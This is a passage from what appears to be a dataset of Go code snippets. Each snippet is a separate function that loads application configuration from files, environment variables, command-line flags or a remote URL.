{\n\t\tdir := config.FileSettings.Directory\n\t\tif len(dir) > 0 && dir[len(dir)-1:] != \"/\" {\n\t\t\tconfig.FileSettings.Directory += \"/\"\n\t\t}\n\t}\n\n\treturn config, configPath, envConfig, nil\n}", "func Load(config *api.Config) error {\n\terr := yamlToProto(viper.ConfigFileUsed(), config)\n\tif err != nil {\n\t\treturn errors.Trace(fmt.Errorf(\"error unmarshalling config file: %w\", err))\n\t}\n\tif config.Target.RepoName == \"\" {\n\t\tklog.Warning(\"'target.repoName' property is empty. Using 'myrepo' default value\")\n\t\tconfig.Target.RepoName = defaultRepoName\n\t}\n\tif err := config.Source.Repo.SetBasicAuth(os.Getenv(\"SOURCE_AUTH_USERNAME\"), os.Getenv(\"SOURCE_AUTH_PASSWORD\")); err != nil {\n\t\treturn err\n\t}\n\tif err := config.Target.Repo.SetBasicAuth(os.Getenv(\"TARGET_AUTH_USERNAME\"), os.Getenv(\"TARGET_AUTH_PASSWORD\")); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (c *Config) LoadFromEnv() error {\n\terr := envconfig.Process(\"\", c)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"can't process environment for config: %w\", err)\n\t}\n\n\treturn nil\n}", "func loadConfig() error {\n\tconfigMap = make(map[string]interface{})\n\tfmt.Println(\"Reading \", os.Args[1])\n\tdat, err := ioutil.ReadFile(os.Args[1])\n\tcheckError(err)\n\n\tif err := json.Unmarshal(dat, &configMap); err != nil {\n\t\tlog.Fatal(\"Error in loading config \", err)\n\t}\n\tprotocol = configMap[\"protocol\"].(string)\n\tipAdd = configMap[\"ipAddress\"].(string)\n\tport = configMap[\"port\"].(string)\n\taddr := []string{ipAdd, port}\n\tselfaddr = strings.Join(addr, \"\")\n\tif selfaddr == \"\" {\n\t\tfmt.Println(\"Could not initialize selfaddr\")\n\t}\n\tchordid = getChordId(port, ipAdd)\n\tpersiStorage :=\n\t\tconfigMap[\"persistentStorageContainer\"].(map[string]interface{})\n\tdict3File = persiStorage[\"file\"].(string)\n\tmethods = configMap[\"methods\"].([]interface{})\n\tstabilizeInterval = configMap[\"stabilizeInterval\"].(float64)\n\tcheckPredInterval = configMap[\"checkPredInterval\"].(float64)\n\tfixfingersInterval = configMap[\"fixfingersInterval\"].(float64)\n\tentrypt = configMap[\"entrypoint\"].(string)\n\tfmt.Println(\"Methods exposed by server: \", methods)\n\treturn nil\n}", "func LoadConfig() (Config, error) {\n\tvar c Config\n\n\tctx := context.Background()\n\n\terr := envconfig.Process(ctx, &c)\n\treturn c, err\n}", "func LoadConfig(conf interface{}, filename string) (err error) {\n\tvar decoder *json.Decoder\n\tfile := OpenFile(conf, filename)\n\tdefer file.Close()\n\tdecoder = json.NewDecoder(file)\n\tif err = decoder.Decode(conf); err != nil {\n\t\treturn\n\t}\n\tjson.Marshal(&conf)\n\treturn\n}", "func load() (*cfgfile.ConfigFile, error) {\n\tif changeConfigDir {\n\t\tlogrus.Infoln(\"use config:\", filepath.Join(configDir, ConfigFileName))\n\t}\n\tconf := newcfgfile(filepath.Join(configDir, ConfigFileName))\n\terr := conf.Load()\n\tif err != nil && err != cfgfile.ErrConfigFileMiss {\n\t\treturn nil, err\n\t}\n\tprgpath, _ := utils.GetProcAbsDir()\n\ttmp, err := ioutil.ReadFile(filepath.Join(prgpath, DefaultUniqueAgentIdFile))\n\tif err != nil {\n\t\tconf.Agentid = ZERO_AGENT_ID\n\t} else {\n\t\tconf.Agentid = strings.TrimSpace(string(tmp))\n\t}\n\n\tConf = conf\n\n\treturn conf, nil\n}", "func loadConfig() (TestingConfig, error) {\n\tvar config TestingConfig\n\n\tusr, err := user.Current()\n\tif err != nil {\n\t\tfmt.Println(\"Could not get current user.\", err)\n\t\treturn TestingConfig{}, err\n\t}\n\n\tpath := filepath.Join(usr.HomeDir, \"/.config/slackposter/config.json\")\n\n\tstr, err := ioutil.ReadFile(path)\n\tif err != nil {\n\t\tfmt.Println(\"Could not read config.json. \", err)\n\t\treturn TestingConfig{}, err\n\t}\n\n\tif err := json.Unmarshal(str, &config); err != nil {\n\t\tfmt.Println(\"Failed to unmarshal config.json:\", err)\n\t\treturn config, err\n\t}\n\n\treturn config, nil\n}", "func LoadConfig() {\n\tvar configFile string\n\t//todo the default config Path\n\tflag.IntVar(&Config.HttpPort, \"httpport\", 13000, \"the http port\")\n\tflag.IntVar(&Config.MsgPort, \"port\", 13001, \"the msg port\")\n\tflag.IntVar(&Config.Retry, \"r\", 3, \"the retry times\")\n\tflag.StringVar(&Config.Aof, \"aof\", \"msgo.aof\", \"the aof file path\")\n\tflag.IntVar(&Config.SyncType, \"sync\", 0, \"the default sync type of aof\")\n\tflag.IntVar(&Config.Threshold, \"rewrite-threshold\", 10000, \"the default threshold of deleteOps that triggers rewrite operation\")\n\tflag.StringVar(&configFile, \"c\", \"\", \"the config file path\")\n\tflag.Parse()\n\tif configFile != \"\" {\n\t\tBytes, err := ioutil.ReadFile(configFile)\n\t\tif err != nil {\n\t\t\tpanic(fmt.Sprintf(\"reading config file error %s: %v\", configFile, err))\n\t\t}\n\t\tif _, err := toml.Decode(string(Bytes), Config); err != nil {\n\t\t\tpanic(fmt.Sprintf(\"parse config file error %s: %v\", configFile, err))\n\t\t}\n\t}\n\tArbitrateConfigs(Config)\n}", "func Load(c Config) error {\n\tc.setDefaults()\n\tc.setCoreUp()\n\n\tif err := c.load(defaultEnv); err != nil {\n\t\treturn fmt.Errorf(\"error reading default configuration file:\", err)\n\t}\n\n\tenv := c.getEnv()\n\tif err := c.merge(env); err != nil {\n\t\treturn fmt.Errorf(\"error reading %s configuration file:\", env, err)\n\t}\n\n\treturn nil\n}", "func LoadConfig(path string) (config Config, err error) {\n\tSetDefaults()\n\tviper.AddConfigPath(path)\n\t// viper.SetConfigName(\"\")\n\tviper.SetConfigFile(\".env\")\n\tviper.SetConfigType(\"env\")\n\tviper.SetEnvPrefix(\"ezptt\") // will be uppercased automatically\n\tviper.AutomaticEnv() // read in environment variables that match\n\n\tif err = viper.ReadInConfig(); err != nil {\n\t\tfmt.Println(\"ReadInConfig:\", err)\n\t}\n\n\terr = viper.Unmarshal(&config)\n\tfmt.Println(\"config:\", config)\n\treturn\n}", "func loadConfig() (*config, error) {\n\tloadConfigError := func(err error) (*config, error) {\n\t\treturn nil, err\n\t}\n\n\t// Default config\n\tcfg := defaultConfig\n\tdefaultConfigNow := defaultConfig\n\n\t// Load settings from environment variables.\n\terr := env.Parse(&cfg)\n\tif err != nil {\n\t\treturn loadConfigError(err)\n\t}\n\n\t// If appdata was specified but not the config file, change the config file\n\t// path, and record this as the new default config file location.\n\tif defaultHomeDir != cfg.HomeDir && defaultConfigNow.ConfigFile == cfg.ConfigFile {\n\t\tcfg.ConfigFile = filepath.Join(cfg.HomeDir, defaultConfigFilename)\n\t\t// Update the defaultConfig to avoid an error if the config file in this\n\t\t// \"new default\" location does not exist.\n\t\tdefaultConfigNow.ConfigFile = cfg.ConfigFile\n\t}\n\n\t// Pre-parse the command line options to see if an alternative config file\n\t// or the version flag was specified. Override any environment variables\n\t// with parsed command line flags.\n\tpreCfg := cfg\n\tpreParser := flags.NewParser(&preCfg, flags.HelpFlag|flags.PassDoubleDash)\n\t_, flagerr := preParser.Parse()\n\n\tif flagerr != nil {\n\t\te, ok := flagerr.(*flags.Error)\n\t\tif !ok || e.Type != flags.ErrHelp {\n\t\t\tpreParser.WriteHelp(os.Stderr)\n\t\t}\n\t\tif ok && e.Type == flags.ErrHelp {\n\t\t\tpreParser.WriteHelp(os.Stdout)\n\t\t\tos.Exit(0)\n\t\t}\n\t\treturn loadConfigError(flagerr)\n\t}\n\n\t// Show the version and exit if the version flag was specified.\n\tappName := filepath.Base(os.Args[0])\n\tappName = strings.TrimSuffix(appName, filepath.Ext(appName))\n\tif preCfg.ShowVersion {\n\t\tfmt.Printf(\"%s version %s (Go version %s)\\n\", appName,\n\t\t\tVersion(), runtime.Version())\n\t\tos.Exit(0)\n\t}\n\n\t// If a non-default appdata folder is specified on the command line, it may\n\t// be necessary adjust the config file location. If the the config file\n\t// location was not specified on the command line, the default location\n\t// should be under the non-default appdata directory. However, if the config\n\t// file was specified on the command line, it should be used regardless of\n\t// the appdata directory.\n\tif defaultHomeDir != preCfg.HomeDir && defaultConfigNow.ConfigFile == preCfg.ConfigFile {\n\t\tpreCfg.ConfigFile = filepath.Join(preCfg.HomeDir, defaultConfigFilename)\n\t\t// Update the defaultConfig to avoid an error if the config file in this\n\t\t// \"new default\" location does not exist.\n\t\tdefaultConfigNow.ConfigFile = preCfg.ConfigFile\n\t}\n\n\t// Load additional config from file.\n\tvar configFileError error\n\t// Config file name for logging.\n\tconfigFile := \"NONE (defaults)\"\n\tparser := flags.NewParser(&cfg, flags.Default)\n\n\t// Do not error default config file is missing.\n\tif _, err := os.Stat(preCfg.ConfigFile); os.IsNotExist(err) {\n\t\t// Non-default config file must exist\n\t\tif defaultConfigNow.ConfigFile != preCfg.ConfigFile {\n\t\t\tfmt.Fprintln(os.Stderr, err)\n\t\t\treturn loadConfigError(err)\n\t\t}\n\t\t// Warn about missing default config file, but continue\n\t\tfmt.Printf(\"Config file (%s) does not exist. Using defaults.\\n\",\n\t\t\tpreCfg.ConfigFile)\n\t} else {\n\t\t// The config file exists, so attempt to parse it.\n\t\terr = flags.NewIniParser(parser).ParseFile(preCfg.ConfigFile)\n\t\tif err != nil {\n\t\t\tif _, ok := err.(*os.PathError); !ok {\n\t\t\t\tfmt.Fprintln(os.Stderr, err)\n\t\t\t\tparser.WriteHelp(os.Stderr)\n\t\t\t\treturn loadConfigError(err)\n\t\t\t}\n\t\t\tconfigFileError = err\n\t\t}\n\t\tconfigFile = preCfg.ConfigFile\n\t}\n\n\t// Parse command line options again to ensure they take precedence.\n\t_, err = parser.Parse()\n\tif err != nil {\n\t\tif e, ok := err.(*flags.Error); !ok || e.Type != flags.ErrHelp {\n\t\t\tparser.WriteHelp(os.Stderr)\n\t\t}\n\t\treturn loadConfigError(err)\n\t}\n\n\t// Create the home directory if it doesn't already exist.\n\tfuncName := \"loadConfig\"\n\terr = os.MkdirAll(cfg.HomeDir, 0700)\n\tif err != nil {\n\t\t// Show a nicer error message if it's because a symlink is linked to a\n\t\t// directory that does not exist (probably because it's not mounted).\n\t\tif e, ok := err.(*os.PathError); ok && os.IsExist(err) {\n\t\t\tif link, lerr := os.Readlink(e.Path); lerr == nil {\n\t\t\t\tstr := \"is symlink %s -> %s mounted?\"\n\t\t\t\terr = fmt.Errorf(str, e.Path, link)\n\t\t\t}\n\t\t}\n\n\t\tstr := \"%s: failed to create home directory: %v\"\n\t\terr := fmt.Errorf(str, funcName, err)\n\t\tfmt.Fprintln(os.Stderr, err)\n\t\treturn nil, err\n\t}\n\n\t// If a non-default appdata folder is specified, it may be necessary to\n\t// adjust the DataDir and LogDir. If these other paths are their defaults,\n\t// they should be modifed to look under the non-default appdata directory.\n\t// If they are not their defaults, the user-specified values should be used.\n\tif defaultHomeDir != cfg.HomeDir {\n\t\tif defaultDataDir == cfg.DataDir {\n\t\t\tcfg.DataDir = filepath.Join(cfg.HomeDir, defaultDataDirname)\n\t\t}\n\t\tif defaultLogDir == cfg.LogDir {\n\t\t\tcfg.LogDir = filepath.Join(cfg.HomeDir, defaultLogDirname)\n\t\t}\n\t}\n\n\t// Warn about missing config file after the final command line parse\n\t// succeeds. This prevents the warning on help messages and invalid\n\t// options.\n\tif configFileError != nil {\n\t\tfmt.Printf(\"%v\\n\", configFileError)\n\t\treturn loadConfigError(configFileError)\n\t}\n\n\t// Choose the active network params based on the selected network. Multiple\n\t// networks can't be selected simultaneously.\n\tnumNets := 0\n\tactiveNet = &netparams.MainNetParams\n\tactiveChain = chaincfg.MainNetParams()\n\tdefaultPort := defaultMainnetPort\n\tif cfg.TestNet {\n\t\tactiveNet = &netparams.TestNet3Params\n\t\tactiveChain = chaincfg.TestNet3Params()\n\t\tdefaultPort = defaultTestnetPort\n\t\tnumNets++\n\t}\n\tif cfg.SimNet {\n\t\tactiveNet = &netparams.SimNetParams\n\t\tactiveChain = chaincfg.SimNetParams()\n\t\tdefaultPort = defaultSimnetPort\n\t\tnumNets++\n\t}\n\tif numNets > 1 {\n\t\tstr := \"%s: the testnet and simnet params can't be \" +\n\t\t\t\"used together -- choose one of the three\"\n\t\terr := fmt.Errorf(str, funcName)\n\t\tfmt.Fprintln(os.Stderr, err)\n\t\tparser.WriteHelp(os.Stderr)\n\t\treturn loadConfigError(err)\n\t}\n\n\t// Append the network type to the data directory so it is \"namespaced\" per\n\t// network. In addition to the block database, there are other pieces of\n\t// data that are saved to disk such as address manager state. All data is\n\t// specific to a network, so namespacing the data directory means each\n\t// individual piece of serialized data does not have to worry about changing\n\t// names per network and such.\n\t//\n\t// Make list of old versions of testnet directories here since the network\n\t// specific DataDir will be used after this.\n\tcfg.DataDir = cleanAndExpandPath(cfg.DataDir)\n\tcfg.DataDir = filepath.Join(cfg.DataDir, activeNet.Name)\n\t// Create the data folder if it does not exist.\n\terr = os.MkdirAll(cfg.DataDir, 0700)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tlogRotator = nil\n\t// Append the network type to the log directory so it is \"namespaced\"\n\t// per network in the same fashion as the data directory.\n\tcfg.LogDir = cleanAndExpandPath(cfg.LogDir)\n\tcfg.LogDir = filepath.Join(cfg.LogDir, activeNet.Name)\n\n\t// Initialize log rotation. After log rotation has been initialized, the\n\t// logger variables may be used. This creates the LogDir if needed.\n\tif cfg.MaxLogZips < 0 {\n\t\tcfg.MaxLogZips = 0\n\t}\n\tinitLogRotator(filepath.Join(cfg.LogDir, defaultLogFilename), cfg.MaxLogZips)\n\n\tlog.Infof(\"Log folder: %s\", cfg.LogDir)\n\tlog.Infof(\"Config file: %s\", configFile)\n\n\t// Disable dev balance prefetch if network has invalid script.\n\t_, err = dbtypes.DevSubsidyAddress(activeChain)\n\tif !cfg.NoDevPrefetch && err != nil {\n\t\tcfg.NoDevPrefetch = true\n\t\tlog.Warnf(\"%v. Disabling balance prefetch (--no-dev-prefetch).\", err)\n\t}\n\n\t// Validate SyncStatusLimit has been set. Zero means always show sync status\n\t// page instead of full block explorer pages.\n\tif cfg.SyncStatusLimit != 0 {\n\t\t// The sync-status-limit value should not be set to a value less than 2\n\t\t// or greater than maxSyncStatusLimit.\n\t\tif cfg.SyncStatusLimit < 2 || cfg.SyncStatusLimit > maxSyncStatusLimit {\n\t\t\treturn nil, fmt.Errorf(\"sync-status-limit should not be set to \"+\n\t\t\t\t\"a value less than 2 or more than %d\", maxSyncStatusLimit)\n\t\t}\n\t}\n\n\t// Validate block purge options.\n\tif cfg.PurgeNBestBlocks < 0 {\n\t\treturn nil, fmt.Errorf(\"purge-n-blocks must be non-negative\")\n\t}\n\n\t// Set the host names and ports to the default if the user does not specify\n\t// them.\n\tcfg.DcrdServ, err = normalizeNetworkAddress(cfg.DcrdServ, defaultHost, activeNet.JSONRPCClientPort)\n\tif err != nil {\n\t\treturn loadConfigError(err)\n\t}\n\n\t// Output folder\n\tcfg.OutFolder = cleanAndExpandPath(cfg.OutFolder)\n\tcfg.OutFolder = filepath.Join(cfg.OutFolder, activeNet.Name)\n\n\t// Special show command to list supported subsystems and exit.\n\tif cfg.DebugLevel == \"show\" {\n\t\tfmt.Println(\"Supported subsystems\", supportedSubsystems())\n\t\tos.Exit(0)\n\t}\n\n\t// Ensure HTTP profiler is mounted with a valid path prefix.\n\tif cfg.HTTPProfile && (cfg.HTTPProfPath == \"/\" || len(defaultHTTPProfPath) == 0) {\n\t\treturn loadConfigError(fmt.Errorf(\"httpprofprefix must not be \\\"\\\" or \\\"/\\\"\"))\n\t}\n\n\t// Parse, validate, and set debug log level(s).\n\tif cfg.Quiet {\n\t\tcfg.DebugLevel = \"error\"\n\t}\n\n\t// Validate DB timeout. Zero or negative should be set to the large default\n\t// timeout to effectively disable timeouts.\n\tif cfg.PGQueryTimeout <= 0 {\n\t\tcfg.PGQueryTimeout = defaultPGQueryTimeout\n\t}\n\n\t// Parse, validate, and set debug log level(s).\n\tif err := parseAndSetDebugLevels(cfg.DebugLevel); err != nil {\n\t\terr = fmt.Errorf(\"%s: %v\", funcName, err.Error())\n\t\tfmt.Fprintln(os.Stderr, err)\n\t\tparser.WriteHelp(os.Stderr)\n\t\treturn loadConfigError(err)\n\t}\n\n\t// Check the supplied APIListen address\n\tif cfg.APIListen == \"\" {\n\t\tcfg.APIListen = defaultHost + \":\" + defaultPort\n\t} else {\n\t\tcfg.APIListen, err = normalizeNetworkAddress(cfg.APIListen, defaultHost, defaultPort)\n\t\tif err != nil {\n\t\t\treturn loadConfigError(err)\n\t\t}\n\t}\n\n\t// Checks if the expected format of the politeia URL was set. It also drops any\n\t// unnecessary parts of the URL.\n\turlPath, err := retrieveRootPath(cfg.PoliteiaURL)\n\tif err != nil {\n\t\treturn loadConfigError(err)\n\t}\n\tcfg.PoliteiaURL = urlPath\n\n\tswitch cfg.ServerHeader {\n\tcase \"off\":\n\t\tcfg.ServerHeader = \"\"\n\tcase \"version\":\n\t\tcfg.ServerHeader = AppName + \"-\" + Version()\n\t}\n\n\t// If detecting real IP from X headers, this implies you are trusting a\n\t// proxy, so we can enable inspecting the other X-Forwarded- headers for\n\t// request host and scheme.\n\tif cfg.UseRealIP {\n\t\tcfg.TrustProxy = true\n\t}\n\n\t// Expand some additional paths.\n\tcfg.DcrdCert = cleanAndExpandPath(cfg.DcrdCert)\n\tcfg.AgendasDBFileName = cleanAndExpandPath(cfg.AgendasDBFileName)\n\tcfg.ProposalsFileName = cleanAndExpandPath(cfg.ProposalsFileName)\n\tcfg.RateCertificate = cleanAndExpandPath(cfg.RateCertificate)\n\tcfg.ChartsCacheDump = cleanAndExpandPath(cfg.ChartsCacheDump)\n\n\t// Clean up the provided mainnet and testnet links, ensuring there is a single\n\t// trailing slash.\n\tcfg.MainnetLink = strings.TrimSuffix(cfg.MainnetLink, \"/\") + \"/\"\n\tcfg.TestnetLink = strings.TrimSuffix(cfg.TestnetLink, \"/\") + \"/\"\n\n\treturn &cfg, nil\n}", "func LoadConfig(configFile string) (*Configuration, error) {\n\tsetConfigDefaults()\n\n\tif len(configFile) > 0 {\n\t\tviper.SetConfigFile(configFile)\n\t} else {\n\t\tviper.SetConfigName(\"copyql\")\n\t\tviper.AddConfigPath(\".\")\n\t}\n\n\tviper.SetEnvPrefix(\"copyql\")\n\tviper.AutomaticEnv()\n\n\tviper.SetEnvKeyReplacer(strings.NewReplacer(\".\", \"_\"))\n\n\tviper.ReadInConfig()\n\n\tvar config Configuration\n\terr := viper.Unmarshal(&config)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &config, nil\n}", "func LoadConfig(configPaths ...string) error {\n\tv := viper.New()\n\n\t// Postgreslq config\n\tv.SetDefault(\"db_max_open_conns\", 5)\n\tv.SetDefault(\"db_conn_exec_timeout\", 3000000)\n\tv.SetDefault(\"db_max_idle_conns_rate\", 0.5)\n\tv.SetDefault(\"db_conn_max_lifetime\", time.Minute*30)\n\n\t// Server port\n\tv.SetDefault(\"server_port\", 9393)\n\tv.SetDefault(\"address\", \"http://localhost:9393\")\n\tv.SetDefault(\"access_token_TTL\", 8)\n\tv.SetDefault(\"jwt_signing_method\", \"HS256\")\n\n\tlogrus.Infof(\"Load configuration in DEV mode\")\n\tv.SetConfigName(\"app\")\n\tv.SetConfigType(\"yaml\")\n\tv.AutomaticEnv()\n\tfor _, path := range configPaths {\n\t\tv.AddConfigPath(path)\n\t}\n\tif err := v.ReadInConfig(); err != nil {\n\t\treturn fmt.Errorf(\"Failed to read the configuration file: %s\", err)\n\t}\n\n\tif err := v.Unmarshal(&Config); err != nil {\n\t\treturn err\n\t}\n\n\treturn Config.Validate()\n}", "func (c *Contexter) LoadConfig() (error){\n\tnewContext := new(Context)\n\terr := c.configurator.Load(newContext)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif !newContext.validate(c.mode) {\n\t\treturn errors.Errorf(\"invalid config\")\n\t}\n\tmutableMutex.Lock()\n defer mutableMutex.Unlock()\n\tc.replaceContext(newContext)\n\treturn nil\n}", "func LoadConfig(parentPath string, container string, env string, fileNames ...string) ServiceConfig {\n\tviper.AutomaticEnv()\n\tviper.SetEnvKeyReplacer(strings.NewReplacer(\"-\", \"_\", \".\", \"_\"))\n\tviper.SetConfigType(\"yaml\")\n\n\tfor _, fileName := range fileNames {\n\t\tviper.SetConfigName(fileName)\n\t}\n\n\tviper.AddConfigPath(\"./\" + container + \"/\")\n\tif len(parentPath) > 0 {\n\t\tviper.AddConfigPath(\"./\" + parentPath + \"/\" + container + \"/\")\n\t}\n\n\tif err := viper.ReadInConfig(); err != nil {\n\t\tswitch err.(type) {\n\t\tcase viper.ConfigFileNotFoundError:\n\t\t\tlog.Println(\"config file not found\")\n\t\tdefault:\n\t\t\tpanic(err)\n\t\t}\n\t}\n\tif len(env) > 0 {\n\t\tenv2 := strings.ToLower(env)\n\t\tfor _, fileName2 := range fileNames {\n\t\t\tname := fileName2 + \"-\" + env2\n\t\t\tviper.SetConfigName(name)\n\t\t\tviper.MergeInConfig()\n\t\t}\n\t}\n\tvar c ServiceConfig\n\tbindEnvs(c)\n\tviper.Unmarshal(&c)\n\treturn c\n}", "func loadFromEnvvar() (*Config, error) {\n\t// App\n\tappServerPort, _ := strconv.Atoi(GetEnvOrDef(\"POSLAN_SERVER_PORT\", \"8080\"))\n\tappLogLevel := GetEnvOrDef(\"POSLAN_LOG_LEVEL\", \"debug\")\n\tproviders := loadProvidersFromEnvars()\n\n\tapp := AppConfig{\n\t\tServerPort: appServerPort,\n\t\tLogLevel: logLevel(appLogLevel),\n\t}\n\n\tmailers := MailerConfig{\n\t\tProviders: providers,\n\t}\n\n\tcfg := &Config{\n\t\tApp: app,\n\t\tMailer: mailers,\n\t}\n\n\treturn cfg, nil\n}", "func loadConfig(confName string, conf interface{}) (interface{}, error) {\n\tpwd := logs.GetCurrentDirectory()\n\tfile, err := os.Open(pwd + \"/\" + confName)\n\tif err != nil {\n\t\tlogs.GetLogger().Error(\"Open monitor configuration file error\", zap.Error(err))\n\t\treturn nil, error2.Errors.NoConfigFileFound\n\t}\n\tdefer file.Close()\n\n\tdecoder := jsoniter.ConfigCompatibleWithStandardLibrary.NewDecoder(file)\n\terr = decoder.Decode(&conf)\n\tif err != nil {\n\t\tlogs.GetLogger().Error(\"Parsing monitor configuration file error\", zap.Error(err))\n\t\treturn nil, error2.Errors.ConfigFileValidationError\n\t}\n\tlogs.GetLogger().Info(\"Successfully loaded monitor configuration file\")\n\treturn conf, nil\n}", "func loadEnvironmentConfig(env string) types.Options {\n\tconfigFile := \"config/\" + ServiceName + \"/\" + env + \".json\"\n\tif _, err := os.Stat(configFile); os.IsNotExist(err) {\n\t\tpanic(err)\n\t}\n\treturn parseConfigFile(configFile)\n}", "func loadConfig() error {\n\t// load template config\n\tif err := config.LoadConfig(\"assets/config.tpl.json\"); err != nil {\n\t\treturn err\n\t}\n\n\t// load custom config\n\tif err := config.LoadConfig(\"config.json\"); err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func LoadConfig() {\n\tviper.SetEnvPrefix(\"yestea\")\n\tviper.AutomaticEnv()\n\n\tviper.SetConfigType(\"yaml\")\n\tviper.AddConfigPath(RootPath() + \"config\")\n\n\tviper.SetConfigName(\"config\")\n\tif err := viper.ReadInConfig(); err != nil {\n\t\tpanic(fmt.Errorf(\"read common config failed: [%s]\", err))\n\t}\n\n\tenv := viper.GetString(\"ENV\")\n\tif env == \"\" {\n\t\tviper.SetConfigName(\"dev\")\n\t}\n\tviper.SetConfigName(env)\n\tif err := viper.MergeInConfig(); err != nil {\n\t\tpanic(fmt.Errorf(\"merge environment config failed: [%s]\", err))\n\t}\n}", "func Load() (Config, error) {\n\tvar c Config\n\terr := envconfig.Process(\"ferrum\", &c)\n\tif err != nil {\n\t\treturn Config{}, fmt.Errorf(\"failed to parse configuration env vars: %v\", err)\n\t}\n\n\tc.LogLevel, err = log.ParseLevel(c.LogLevelRaw)\n\tif err != nil {\n\t\treturn Config{}, fmt.Errorf(\"failed to parse log level: %v\", err)\n\t}\n\n\tc.Version = version\n\tc.BuildDate = buildDate\n\n\treturn c, nil\n}", "func LoadConfig(configpath string) *viper.Viper {\n\tvar conf Config\n\tviperCfg := viper.New()\n\tviperCfg.SetConfigName(\"dev\")\n\tviperCfg.AddConfigPath(configpath)\n\tviperCfg.AutomaticEnv()\n\tviperCfg.SetConfigType(\"yml\")\n\t// configPath := \"${path}/config/config.yml\"\n\n\tif err := viperCfg.ReadInConfig(); err != nil {\n\t\tfmt.Printf(\"Failed to read the config file %s\", err)\n\t}\n\n\tif err := viperCfg.Unmarshal(&conf); err != nil {\n\t\tfmt.Printf(\"Failed to read the config file %s\", err)\n\t}\n\n\tviperCfg.WatchConfig()\n\n\treturn viperCfg\n}", "func loadConfig(opt options) (original, cfg LocalConfig) {\n\tcfg, err := LoadConfigFile(opt.configPath)\n\tif err != nil {\n\t\tlog.Printf(\"unable to load config file: %q\\n\", opt.configPath)\n\t\tcfg = NewConfig()\n\t}\n\toriginal = cfg\n\n\t// Override any store specific settings.\n\tif opt.s3Region != \"\" {\n\t\tcfg.Store.S3Region = opt.s3Region\n\t}\n\tif opt.s3Bucket != \"\" {\n\t\tcfg.Store.S3Bucket = opt.s3Bucket\n\t}\n\tif opt.awsAccessKey != \"\" {\n\t\tcfg.Store.AWSAccessKey = opt.awsAccessKey\n\t}\n\tif opt.awsSecretKey != \"\" {\n\t\tcfg.Store.AWSSecretKey = opt.awsSecretKey\n\t}\n\n\treturn\n}", "func LoadConfig(fileName string) error {\n\n\tfile, err := os.Open(fileName)\n\tif err != nil {\n\t\tappError := models.NewAppError(\"LoadConfig\", \"utils.config.load_conifg.open_file: \", err.Error(), 500)\n\t\treturn appError\n\t}\n\n\tdecoder := json.NewDecoder(file)\n\tconfig := models.Config{}\n\terr = decoder.Decode(&config)\n\tif err != nil {\n\t\tappError := models.NewAppError(\"LoadConfig\", \"utils.config.load_config.decode_json: \", err.Error(), 500)\n\t\treturn appError\n\t}\n\n\tconfig.SetDefaults()\n\n\tCfg = &config\n\n\treturn nil\n}", "func LoadConfig(fileLocation string, vip *viper.Viper) (err error) {\n\tlog.Info(\"Parsing config file at location: %s\", fileLocation)\n\n\tif fileLocation == \"\" {\n\t\tfileLocation = defaultConfigFileName\n\t}\n\n\tvip.SetConfigFile(fileLocation)\n\terr = vip.ReadInConfig()\n\n\tif err != nil {\n\t\tif fileLocation != defaultConfigFileName {\n\t\t\tlog.Warning(\"failed loading %v trying %v\", fileLocation, defaultConfigFileName)\n\t\t\tvip.SetConfigFile(defaultConfigFileName)\n\t\t\terr = vip.ReadInConfig()\n\t\t}\n\t\t// we change err so check again\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"failed to read config file %v\", err)\n\t\t}\n\t}\n\n\treturn nil\n}", "func loadConfig(confLocation string) (Config, error) {\n\tvar err error\n\tvar conf Config\n\tvar reader io.Reader\n\n\t//\tcheck for http prefix\n\tif strings.HasPrefix(confLocation, \"http\") {\n\t\tlog.Printf(\"Loading remote config (%v)\", confLocation)\n\n\t\t//\tsetup http client with a timeout\n\t\tvar httpClient = &http.Client{\n\t\t\tTimeout: time.Second * 10,\n\t\t}\n\n\t\t//\tmake the http request\n\t\tres, err := httpClient.Get(confLocation)\n\t\tif err != nil {\n\t\t\treturn conf, fmt.Errorf(\"error fetching remote config file (%v): %v \", confLocation, err)\n\t\t}\n\n\t\t//\tset the reader to the response body\n\t\treader = res.Body\n\t} else {\n\t\tlog.Printf(\"Loading local config (%v)\", confLocation)\n\n\t\t//\tcheck the conf file exists\n\t\tif _, err := os.Stat(confLocation); os.IsNotExist(err) {\n\t\t\treturn conf, fmt.Errorf(\"config file at location (%v) not found!\", confLocation)\n\t\t}\n\n\t\t//\topen the confi file\n\t\treader, err = os.Open(confLocation)\n\t\tif err != nil {\n\t\t\treturn conf, fmt.Errorf(\"error opening local config file (%v): %v \", confLocation, err)\n\t\t}\n\t}\n\n\t//\tdecode conf file\n\tif _, err := toml.DecodeReader(reader, &conf); err != nil {\n\t\treturn conf, err\n\t}\n\n\treturn conf, nil\n}", "func loadConfig() {\n\tr, err := os.Open(configPath)\n\tif err != nil {\n\t\tlog.Fatalf(\"Can't open config file!\")\n\t}\n\tdefer r.Close()\n\tdec := json.NewDecoder(r)\n\tdec.Decode(&config)\n\n\tlog.Printf(\"Config.DBAddress: %s\\n\", config.DBAddress)\n\tlog.Printf(\"Config.WorkersNo: %d\\n\", config.WorkersNo)\n\tlog.Printf(\"Config.ClearDb: %t\\n\", config.ClearDb)\n\tlog.Printf(\"Config.From: %s\\n\", config.From)\n\tlog.Printf(\"Config.To: %s\\n\", config.To)\n\tlog.Printf(\"Config.Currency: %s\\n\", config.Currency)\n\tlog.Printf(\"Config.SupportedCurrencies: %v\\n\", config.Currencies)\n}", "func LoadConfig(path string) {\n\tConf = *NewConfigByPath(path)\n}", "func LoadConfig(fpath string) (*PinoyConfig, error) {\n\tcontent, err := ioutil.ReadFile(fpath)\n\tif err != nil {\n\t\tlog.Println(\"Config:ERROR: Failed to read config file:\", err)\n\t\treturn nil, err\n\t}\n\n\tvar cfg PinoyConfig\n\terr = json.Unmarshal(content, &cfg)\n\tif err != nil {\n\t\tlog.Println(\"Config:ERROR: Failed to unmarshal config file:\", err)\n\t}\n\tcfg.NormalizeConfig()\n\treturn &cfg, nil\n}", "func loadConfig(file string) error {\n\tf, err := os.Open(file) // Open file\n\n\t// Error checking, returns error\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer f.Close() // Defer file closing to end of 